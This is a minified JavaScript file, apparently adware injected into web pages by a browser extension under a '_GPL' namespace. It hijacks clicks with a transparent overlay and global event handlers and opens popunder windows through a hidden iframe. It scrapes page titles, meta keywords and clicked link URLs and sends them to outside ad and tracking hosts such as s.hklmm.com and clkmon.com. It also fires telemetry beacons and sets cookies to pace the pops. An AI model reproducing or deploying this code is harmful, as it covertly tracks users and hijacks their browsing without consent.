_GPL.j(function(g,b,ia,z,n,e,k,va,wa,rb,ja,A,bb,ka,t,sb,p,xa,X,ya,B,u,tb,v,cb,T){function L(){za(h,X,L);db(function(a,c){d=a;Y||(Y=!0,eb(),fb(),la(),Aa(h,X,la),Ba=ka(function(){36E5<+new n-Ca&&U(!1)},5E3))})}function la(){Ca=+new n}function U(a){Y&&(g("iframe").off("mouseover",Da),M.remove(),Y=!1,ia(Ba),gb(),za(h,X,la),d=void 0,F=w="",a||Aa(h,X,L),t(L,1E3*Math.max(G,x)))}function Aa(a,c,f){if(p[xa])a[xa](c,f,!1);else a.attachEvent("on"+c,f)}function fb(){Z=!0;b.ah&&b.ah(C,N);g("*").add(p).on(C,N);
Ea||(Ea=!0,g("*").add(p).on("mousedown mouseup click",Fa));g("iframe").each(function(a,c){try{g(c.contentWindow).on(C,N)}catch(f){}});Ga=ka(function(){g("iframe").each(function(a,c){c[Ha]||(c[Ha]=1,g(c).mouseover(Da))})},100);if(V)try{b.log("Attempting to pop from extension to: "+d);var a="ld893_";w&&(a+="_"+e(w),F&&(a+=","+F),a+="_");var a=a+("_"+E()),c=b.proto+b.baseCDN+"/pwn.html?u="+e(d)+"&n="+a+"&r=";"h"!=V||O?"w"!=V||O||(O=!0,ma(p,"openThatTabBitch",{url:c,isUnder:!1,attr:"z7b85_91c4"}),t(function(){O=
!1},100)):(O=!0,ma(h,"createNewTab",{url:c,focused:"true"}),ma(h.documentElement,"createNewTab",{url:c,focused:"true"}),t(function(){O=!1},100));var f=ka(function(){h.documentElement.getAttribute("z7b85_91c4")&&(ia(f),U(!0),Ia(),h.documentElement.removeAttribute("z7b85_91c4"))},50)}catch(Ja){}}function ma(a,c,f){if(h.createEvent){var b=h.createEvent("CustomEvent");b.initCustomEvent(c,!1,!1,f);a.dispatchEvent(b)}else b=h.createEventObject(),b.detail=f,b.realType=c,a.fireEvent("ondataavailable",b)}
function H(a){a=ja.userAgent.match(bb(a+"[/ ](\\d+)","i"));return(a&&a[1])|0}function hb(){if(H("Chrome")){for(var a=0;a<ja.plugins.length;a++)if("Widevine Content Decryption Module"==ja.plugins[a].name)return!1;return!0}return!1}function eb(){M||(M=g('<div style="z-index:999999999999999;cursor:pointer;display:none;position:absolute;background:transparent;">&nbsp;</div>').appendTo("body"),M.mouseout(function(){M.hide()}))}function Da(a){var c=g(a.target),f=c.offset();f.width=c.outerWidth();f.height=
c.outerHeight();f.display="block";M.css(f);a.stopPropagation()}function ib(a){if(d!=Ka){a=a.target||a.srcElement;for(var c="";a;){P||(P=a.tagName);if("A"==a.tagName&&a.href&&a.protocol.toLowerCase().match(/^http/)){c=a.protocol+"//"+a.host+a.pathname+a.search+a.hash;break}a=a.parentNode}if(!d)return!1;c&&(d+="&t="+e(c.substring(0,Math.max(0,1500-d.length))));d+="&rt="+(+new n-La);P&&(d+="&data_tag="+e(P));"/"!=k.pathname&&(d+="&mk="+e(b.B64.encode(na().substring(0,Math.max(0,1500-d.length)))));d+=
Ma?"&data_sid="+e(Ma):""}b.log("Popping to: "+d);a="ld893_";w&&(a+="_"+e(w),F&&(a+=","+F),a+="_");c=a+="_"+E();Q.parentNode||(Na=Oa());if(a=Na("",1749==q?c:"_blank"))a.name=c,0.02>Math.random()?(c=""+d,-1<d.indexOf(aa)&&(c="http://"+aa+"/pclk?c="+e(w)+"&crl="+e(d)),a.location.href=c):a.location.href=d;return a}function na(){function a(a){return a.toLowerCase().replace(/[.,!?]/g," ").split(" ")}var c=[];g("title").length&&(c=c.concat(a(g("title").text())));g('meta[property="og:title"],meta[property="og:description"],meta[name="description"],meta[name="keywords"]').each(function(){var f=
g.trim(g(this).attr("content"));f&&f.match(/^\s*[a-zA-Z0-9]/)&&(c=c.concat(a(f)))});return g.trim(function(a){var c=[];g.each(a,function(a,f){-1==g.inArray(f,c)&&c.push(f)});return c}(c).join(",").replace(/([,]+)/g,",").replace(/\s+/g," "))}function Pa(a,c){a=(a||k.href).substr(0,1500);var f="/"!=k.pathname?na():"";a=a.replace(/:/g,"%3A");var f=f.replace(/:/g,"%3A").substring(0,Math.max(0,1500-a.length)),Ja=b.getSubId?"&subid="+b.getSubId(ba):"",f=e(b.B64.encode(a+"::z-"+q+"-"+Qa+"::"+f)),d="&cb="+
(c||oa),d=d+("&data_fr="+(Ra(y)?"false":"true")),d=d+("&data_proto="+e(k.protocol));"20150522_t"==l&&(d+="&ed=1");return b.proto+aa+"/pops?c="+f+"&a=1&ch="+e(W)+Ja+d}function za(a,c,f){if(p[ya])a[ya](c,f,!1);else a.detachEvent("on"+c,f)}function gb(){Z=!1;b.rh&&b.rh(C,N);g("*").add(p).off(C,N);g("iframe").each(function(a,c){try{g(c.contentWindow).off(C,N)}catch(f){}});ia(Ga)}function jb(a){a=a||p.event||{};if(V&&h.documentElement.getAttribute("z7b85_91c4"))return!0;for(a=a.target||a.srcElement;a;){if(a["91c4"])return!0;
a=a.parentNode}return!1}function kb(a,c){var f=0,b;c=c||[];for(var d=Math.random(),e=0;e<c.length;e++)if(f+=c[e][1],d<f&&!b&&(b=c[e][0]),c[e][0]==a){b=a;break}return b||c[0][0]}function R(a,c){a=A(a,10);isNaN(a)&&(a=A(ca&&ca.getItem(c)||b.gc(c,10),10)||0);return a}function Ra(a){return(new n(1E3*(a||0))).toDateString()==(new n).toDateString()}function da(){y|=0;r|=0;I|=0;var a=E(),c=r&&!Ra(y);c&&(r=0,s.set(v,r));var b=!J||a-y>=G&&r<J,a=a-I>=x;return!m&&c||b&&a}function N(a){a=a||p.event;if(!jb(a)){var c=
Z&&lb(),f=c&&ib(a);if(f&&!f.closed)return U(!0),Ia(),(new Image).src="//cdnstats-a.akamaihd.net/s.gif?t=p_success&d="+e(b.gd())+"&xr="+(m?"1":"0")+"&cid="+b.vars.cid+"&pid="+q+"&r="+999999999*Math.random(),ea&&z(ea),fa&&z(fa),pa=!0,Fa(a);f&&f.closed?fa||(fa=t(function(){(new Image).src="//cdnstats-a.akamaihd.net/s.gif?t=popclose&u="+e(d)+"&location="+e(k.hostname)+"&pid="+q+"&tag="+e(P||"")+"&r="+999999999*Math.random()},1E3)):c&&(ea||(ea=t(function(){(new Image).src="//cdnstats-a.akamaihd.net/s.gif?t=popfail&u="+
e(d)+"&location="+e(k.hostname)+"&pid="+q+"&tag="+e(P||"")+"&r="+999999999*Math.random()},1E3)))}}function lb(){if(!s.swf)return!0;y=R(s.get(B),B);316808>Sa.score&&(r=R(s.get(v),v));var a=Ta(s.get(u));I=R(a[S],u);return da()}function E(){return va(new n/1E3)}function Ua(a,c,b){s.set(a,b);b=E();ca&&ca.setItem(a,b);c=A(c,10);var e=new n;e.setSeconds(e.getSeconds()+c);h.cookie=a+"="+b+";expires="+e.toUTCString()+";path=/;domain="+S}function Ia(){var a=E();Ua(B,G,a);s.set(cb,a);y=a;s.set(v,++r);x&&Ua(u,
x,ga+(ga&&",")+S+":"+a)}function Ta(a){var c={},b=E(),e=[];a=(a||"").split(",");if(a.length){for(var d=0;d<a.length;++d){var g=a[d].split(":"),h=A(g[1],10);b-h<x&&(c[g[0]]=h,e.push(g[0]+":"+h))}ga=e.join(",");s.set(u,ga)}return c}function qa(){return da()||m?1:E()-(A(I,10)||0)<x?Infinity:r>=J?"US"==b.vars.cid?149058:-1<["CA","GB","AU","FR","IT"].indexOf(b.vars.cid)?88620:59858:"US"==b.vars.cid?47432:-1<["CA","GB","AU","FR","IT"].indexOf(b.vars.cid)?59858:49928}function mb(a){"US"==b.vars.cid?ra(a,
47432,149058):-1<["CA","GB","AU","FR","IT"].indexOf(b.vars.cid)?ra(a,59858,88620):ra(a,49928,59858);return da()}function ra(a,c,b){a>=c&&(G=0,a>=b&&r>=J&&(r=wa(0,J-1)))}function Va(a){z(ha);if(!m&&1735!=q){var c=qa(),b="http://clkmon.com/adServe/banners?pid=14442&cid="+Qa+"&action=r&q=",d="/"!=k.pathname?na():"",b=b+e(d.substring(0,Math.max(0,1500-b.length)));p[oa]({url:b,score:c});(new Image).src="//cdnstats-a.akamaihd.net/s.gif?t=popfallback&reason="+e(a)+"&pid="+q+"&u="+e(k.hostname)+"&r="+999999999*
Math.random()}}function db(a){!function f(){s.get(["frt","_GPL_oo_z7b85",B,u,v,T],function(d){if(d.v.frt){if("1750"==q){var g=A(d.v._GPL_oo_z7b85,10)||0;if(86400>va(new n/1E3)-g)return}Wa.getAttribute("data-openThatTabBitch")&&"t3"==b.vars.wptg&&(g=["wp_t3_c","wp_t3_t"],l=d.v[T],l&&-1!=g.indexOf(l)||(l=g[Math.floor(Math.random()*g.length)],s.set(T,l)),"wp_t3_t"==l&&(V="w"));l||(l=d.v[T],l=kb(l,[["20150522_c",0.95],["20150522_t",0.05]]),s.set(T,l));Xa||(Xa=!0,b.pc(function(){Ya?Ya=!1:Z||(sa=!1,U(),
L())}));p[oa]=function(b){nb(b,a)};g=E();y=R(d.v[B],B);r=R(d.v[v],v);d=Ta(d.v[u]);I=R(d[S],u);if(da()){d=qa();ta=+new n;var k=h.createElement("script");k.src=Pa()+"&ms="+d+"&r="+g;k.onerror=function(){Va("error")};Wa.appendChild(k);(new Image).src="//cdnstats-a.akamaihd.net/s.gif?t=p_req&ms="+d+"&d="+e(b.gd())+"&xr="+(m?"1":"0")+"&cid="+b.vars.cid+"&pid="+q+"&r="+999999999*Math.random();z(ha);ha=t(function(){Va("time")},15E3)}else d=qa(),b.log("minScoreNeeded: "+d),Infinity>d&&!sa&&!m&&(ta=+new n,
b.insertJS(Pa()+"&ms="+d+"&r="+g),(new Image).src="//cdnstats-a.akamaihd.net/s.gif?t=p_req&ms="+d+"&d="+e(b.gd())+"&xr="+(m?"1":"0")+"&cid="+b.vars.cid+"&pid="+q+"&r="+999999999*Math.random(),sa=!0),z(ua),ua=t(f,1E3*(5+wa(g,y+G,I+x)-g))}})}()}function Oa(){Q=h.createElement("iframe");Q.style.display="none";Q.style.visibility="hidden";h.body.appendChild(Q);return Q.contentWindow.open}function Fa(a){if(pa)return a.cancelBubble=!0,a.stopPropagation&&a.stopPropagation(),a.stopImmediatePropagation&&a.stopImmediatePropagation(),
a.preventDefault&&a.preventDefault(),t(function(){pa=!1},100),!1}function nb(a,c){z(ha);var d=+new n-ta;F=w="";a&&(a.crid&&(F=a.crid),a.cid&&(w=a.cid,a.url||(a.url="http://"+aa+"/click?c="+e(w),a.url+=b.getSubId?"&subid="+b.getSubId(ba):"",a.url+=l?"&data_test="+e(l):"",a.url+="&data_fb="+(hb()?"yes":"no"),a.url+="&data_rtt="+d,a.url+="&data_proto="+e(k.protocol),a.url+="&data_ic="+(Za?"true":"false"),a.url+="&data_ss="+(screen.availHeight||0)+"x"+(screen.availWidth||0))),m&&!a.cid&&(a.url=Ka,a.cid=
"xr"),d=A(a.score,10),m||0<d&&mb(d)?(La=+new n,z(ua),a.url&&a.expires&&(z($a),$a=t(function(){U(!0);L()},1E3*A(a.expires,10))),Sa={score:d,now:new n/1},c(a.url,d),(new Image).src="//cdnstats-a.akamaihd.net/s.gif?t=p_bid&d="+e(b.gd())+"&xr="+(m?"1":"0")+"&cid="+b.vars.cid+"&pid="+q+"&r="+999999999*Math.random(),"20150522_t"==l&&a.domain&&((new Image).src=b.proto+a.domain+"/favicon.ico")):(new Image).src="//cdnstats-a.akamaihd.net/s.gif?t=p_nobid&d="+e(b.gd())+"&xr="+(m?"1":"0")+"&cid="+b.vars.cid+
"&pid="+q+"&r="+999999999*Math.random())}var s=b.items.e6a00,h=p.document,Wa=h.body,ca=p.localStorage,ob=H("chrome"),pb=H("firefox");H("opera");var qb=H("safari");H("webkit");var W=b.item_vars["22555_ch"]||b.item_vars.ch||"",G,y,I,K=b.dt(),K=K&&K.inherited&&K.inherited.t||[],m="x"==W||-1<K.indexOf("adult")||0==K.length&&0<g('meta[content="RTA-5042-1996-1400-1577-RTA"]').length;m&&(-1==K.indexOf("adult_block")?W="x":(W="x-issue",m=!1));var x,ba="z7b85",aa=b.gsd&&b.gsd(ba)||"s.hklmm.com",Y=!1,Ba,Ca,
Z=!1,S=b.gd(),d,La=0,ta=0,$a,ga="",r=0,J,Sa={},w="",F="",ua,sa=!1,l,ea,fa,ha,P,C="click";if(ob||qb)C="mousedown";else if(pb||h.all||H("trident"))C="mouseup";var ab=b.zoneid(ba,!0).split("_"),Qa=ab[0],q=ab[1]||b.vars.pid,Ma=b.vars.systemid,Ka="http://secure.xsrving.com/display?size=800x600&ch="+e(W)+"&referer="+e(S),V=!1,O=!1,oa=b.rs(20),M,Ha=b.rs(12),Ga,Za=function(){try{return p[(p.btoa||function(a){return a})(k.hostname+"::"+(new n).toDateString())]===k.protocol}catch(a){return!1}}(),Xa=!1,Ya=!0,
Q,Na=Oa(),pa=!1,Ea=!1;1797==q&&"GB"==b.vars.cid||"facebook.com"==S||(Za?(new Image).src="//cdnstats-a.akamaihd.net/s.gif?t=idlecrawler&d="+e(b.gd())+"&xr="+(m?"1":"0")+"&cid="+b.vars.cid+"&pid="+q+"&r="+999999999*Math.random():(m?(J=G=0,x=180,B+="_xr",u+="_xr",v+="_xr"):(G=360,J=4,x=360),L()))},_GPL,clearInterval,clearTimeout,Date,encodeURIComponent,location,Math.floor,Math.max,Math.random,navigator,parseInt,RegExp,setInterval,setTimeout,void 0,window,"addEventListener","mousemove","removeEventListener",
"ld893_pop_g","ld893_pop_s","ld893_s","ld893_pop_gs","ld893_spopd","z7b85_test");
